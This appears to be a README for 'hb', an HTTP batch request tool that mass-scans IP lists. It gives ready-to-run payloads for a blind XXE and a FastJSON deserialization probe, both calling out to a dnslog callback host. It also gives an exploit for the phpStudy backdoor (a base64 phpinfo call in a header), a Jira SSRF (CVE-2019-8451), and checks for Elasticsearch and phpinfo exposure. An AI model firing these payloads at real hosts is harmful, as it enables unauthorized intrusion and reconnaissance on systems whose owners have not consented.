Awesome
hb
Fast http batch request tool
Installing
bash build.sh
Example
Load File Target
./hb -f ips.txt -p 80
Add HTTP Header
-H "Host: bypasscdn"
Show ProgressBar
-pg
Follow redirect (30x)
-redirect
Filter Response Body
-grep "admin"
Filter Response Header (X-Powered-By ContentType Title)
-filter "nginx"
Filter Response Status Code
-code 2 # 2xx
Show Resposne Body
-response
Shuffle Request
-random
Send Post Request
-body "a=1&b=2&c=2"
# post body from file
-bodyfile ./exploit
Send PUT Request
-method PUT
Show Request Error
-debug
Elasticsearch
-p 9200 -path "/_cat" -grep "/_cat/allocation"
PHPINF0
-path /phpinfo.php -code 2 -grep 'PHP Version' -regexp 'PHP Version(.*?)<'
XXE Blind
-body '<?xml version="1.0"?><!DOCTYPE ANY [<!ENTITY remote SYSTEM "http://{{hostname}}.dnslog/">]><x>&remote;</x>' -replace
FastJSON Blind
-H "Content-Type: application/json" -body '{"@type": "java.net.InetAddress", "val":"{{hostname}}.dnslog"}' -replace -redirect
Weblogic fingerprint
-p 7001 -H "Authorization: Basic" -code 401
phpStudy Backdoor
-H "Accept-Charset: cGhwaW5mbygpOwo=" -H "Accept-Encoding: gzip,deflate" -grep 'PHP Version' -regexp '<tr><td class="e">disable_functions</td><td class="v">(.*?)</td>' -redirect
CVE-2019-8451 Jira SSRF
-path "/plugins/servlet/gadgets/makeRequest?url={{scheme}}://{{host}}@baidu.com/" -H "X-Atlassian-Token: no-check" -replace -grep "www.baidu.com" -regexp '<meta name="ajs-version-number" content="(.*?)">' -redirect